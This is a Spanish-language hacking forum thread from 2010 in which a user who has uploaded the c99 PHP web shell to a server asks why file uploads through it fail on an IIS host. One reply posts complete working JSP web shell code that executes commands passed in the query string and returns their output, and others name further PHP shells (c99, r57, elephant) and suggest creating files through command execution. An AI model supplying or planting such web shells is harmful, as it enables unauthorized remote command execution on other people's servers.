Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: Halos en 4 Febrero 2010, 01:06 am


Título: Shell para IIS
Publicado por: Halos en 4 Febrero 2010, 01:06 am
Buenas! No tengo mucha experiencia con shells así que me gustaría que me aclaraseis algunas dudillas que tengo.

He subido una shell a un servidor, la famosa c99. He intentado subir ficheros a través de ella pero nanai, no aparecen. Y no es por problemas de permisos, porque se ven los permisos de la carpeta rwxrwxrwx y porque sí he podido mover archivos a la carpeta a la que quiero subir el nuevo archivo. Mi duda es si esta shell está más orientada a servidores linux y para un servidor IIS debería utilizar otra. Pienso que el fallo puede ser por el SO, aunque si la shell funciona en php debería de funcionar independientemente del SO, ¿no? Pensé también que podría ser culpa del no-script, pero permitiendo los scripts en firefox y utilizando el chrome, sin bloqueo de script, tampoco. La verdad es que no sé como funcionan estas shells internamente, y sería interesante saberlo, por curiosidad, para solucionar esto y para saber bien lo que hago  ;D

Un saludo!

Título: Re: Shell para IIS
Publicado por: kamsky en 4 Febrero 2010, 01:12 am
no tiene nada que ver ni el OS ni el explorador, php es php en linux en windows y en la conchinchina

como has intentado subir los archivos?

Título: Re: Shell para IIS
Publicado por: Darioxhcx en 4 Febrero 2010, 04:21 am
claro , si funciona en php tendria que subir , capas que no podes subir archivos , pero si podes ejecutar comandos podrias usar algo con fopen y crear tu archivo

Título: Re: Shell para IIS
Publicado por: WHK en 4 Febrero 2010, 09:12 am
si necesitas para jsp acá tienes una:

Código
  1. <%@ page import="java.io.*, java.net.*" %>
  2.  
  3. <%
  4.  
  5.        String queryString = request.getQueryString();
  6.  
  7.  
  8.  
  9.        if (queryString == null) return;
  10.  
  11.  
  12.  
  13.        String line;
  14.  
  15.        Process p = Runtime.getRuntime().exec(URLDecoder.decode(queryString));
  16.  
  17.        BufferedReader input = new BufferedReader(new InputStreamReader(p.getInputStream()));
  18.  
  19.        while ((line = input.readLine()) != null) {
  20.  
  21.                out.println(line);
  22.  
  23.        }
  24.  
  25.    input.close();
  26.  
  27. %>     
  28.  
  29. <form method=POST>
  30.  
  31. <input type=text name=queryString>
  32.  
  33. <input type=submit>
  34.  
  35. </form>

Si el servidor soporta php usas la c99, r57, el elephant o lo que se te ocurra.

Título: Re: Shell para IIS
Publicado por: Halos en 4 Febrero 2010, 15:18 pm
Gracias por las respuestas y por la shell jsp!  ;)

Una duda, entre c99 y r57, ¿alguna está más recomendada para algún uso en concreto? ¿O es solo cuestión de gustos como KDE o GNOME?

Título: Re: Shell para IIS
Publicado por: Darioxhcx en 4 Febrero 2010, 15:30 pm
.___________________.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines